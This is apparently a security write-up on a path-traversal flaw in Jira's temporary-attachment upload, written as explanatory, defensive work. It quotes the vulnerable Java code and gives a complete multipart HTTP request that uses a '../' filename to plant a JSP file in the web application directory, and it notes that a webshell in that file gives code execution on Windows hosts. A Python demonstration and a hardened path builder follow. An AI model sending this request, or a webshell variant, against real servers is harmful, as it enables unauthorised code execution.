The vulnerable code is at line 31: the temporary attachment path is built directly from the client-supplied filename, with no validation at all:
    31  tempAttachmentFile = new File(tmpDir, uniqueId + "_" + fileName);
The fileName argument comes straight from the multipart request, passed in at line 13:
    13  [...]createTemporaryAttachment(filePart.getName(), filePart.getContentType(), filePart.getInputStream());
Because the filename is used as-is, a request like the following can place a JSP file (and therefore a JSP shell) in the web application directory /atlassian-jira/:
POST /rest/collectors/1.0/tempattachment/multipart/2c1ce5fa HTTP/1.1
Host: hackme.atlassian.net
Cookie: atlassian.xsrf.token=BQ79-A85Q-7DOM-UMFN|e98231aaaef98a0d9dc7c52e87f4e84cf9cd3085
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------16266315542468
Content-Length: 345

-----------------------------16266315542468
Content-Disposition: form-data; name="screenshot"; filename="/../../../atlassian-jira/hello.jsp"
Content-Type: text/plain

<h1>Hello world!</h1>
-----------------------------16266315542468
The filename from the request, "/../../../atlassian-jira/hello.jsp", is appended to the uniqueId, giving the following path:
On Windows:
    C:\Program Files\Atlassian\Application Data\JIRA\caches\tmp_attachments\6177763437089900999_/../../../atlassian-jira/hello.jsp
On Linux:
    /opt/atlassian/jira/caches/tmp_attachments/6177763437089900999_/../../../atlassian-jira/hello.jsp
On Windows the path is normalized lexically before the file is created, so it collapses to "C:\Program Files\Atlassian\Application Data\JIRA\atlassian-jira\hello.jsp" and the upload is written into the web application directory. On Linux the kernel resolves the path component by component against the real filesystem: the directory "/opt/atlassian/jira/caches/tmp_attachments/6177763437089900999_" does not exist, so the ".." segments cannot be traversed and the write fails; the traversal is not usable there.
Replacing the harmless hello.jsp content with a webshell would give the attacker code execution on a Windows-hosted Jira.
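The Windows-versus-Linux behaviour described above, as an added Python example that is not part of the original write-up: it rebuilds the vulnerable path from the page's uniqueId and filename, shows where lexical normalization (the Windows case) sends it, shows a POSIX open failing at the non-existent "<uniqueId>_" directory, and contrasts a hardened construction that keeps only the leaf name and re-checks containment. The function names are mine; the constants are the values quoted on the page.

```python
import errno
import os
import tempfile

# Values taken from the write-up's request and path examples.
UNIQUE_ID = "6177763437089900999"
FILENAME = "/../../../atlassian-jira/hello.jsp"
LINUX_TMP = "/opt/atlassian/jira/caches/tmp_attachments"


def build_attachment_path(tmp_dir, unique_id, file_name):
    """Mirror of the vulnerable line 31: new File(tmpDir, uniqueId + "_" + fileName)."""
    return os.path.join(tmp_dir, unique_id + "_" + file_name)


def lexical_target(tmp_dir, unique_id, file_name):
    """Collapse '..' purely lexically, as Windows does before touching the disk.
    This is where the uploaded file ends up on a Windows host."""
    return os.path.normpath(build_attachment_path(tmp_dir, unique_id, file_name))


def escapes_tmp_dir(tmp_dir, unique_id, file_name):
    """True when the lexically normalized path lands outside tmp_dir."""
    base = os.path.normpath(tmp_dir)
    return os.path.commonpath([base, lexical_target(tmp_dir, unique_id, file_name)]) != base


def posix_open_errno(unique_id, file_name):
    """POSIX resolves each component against the real filesystem, so the '..' after
    the non-existent '<uniqueId>_' directory fails before anything is touched.
    Runs in a fresh empty temp dir; returns the errno name, or None if open succeeded."""
    with tempfile.TemporaryDirectory() as tmp_dir:
        try:
            with open(build_attachment_path(tmp_dir, unique_id, file_name), "rb"):
                return None
        except OSError as exc:
            return errno.errorcode.get(exc.errno)


def safe_attachment_path(tmp_dir, unique_id, file_name):
    """Hardened construction: keep only the last path component of the client name
    (either separator style), then re-check containment. Returns None on rejection."""
    leaf = os.path.basename(file_name.replace("\\", "/"))
    if leaf in ("", ".", ".."):
        return None
    base = os.path.normpath(tmp_dir)
    candidate = os.path.normpath(os.path.join(base, unique_id + "_" + leaf))
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate
```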
Remediation
For the fix in Jira, refer to the official Jira documentation.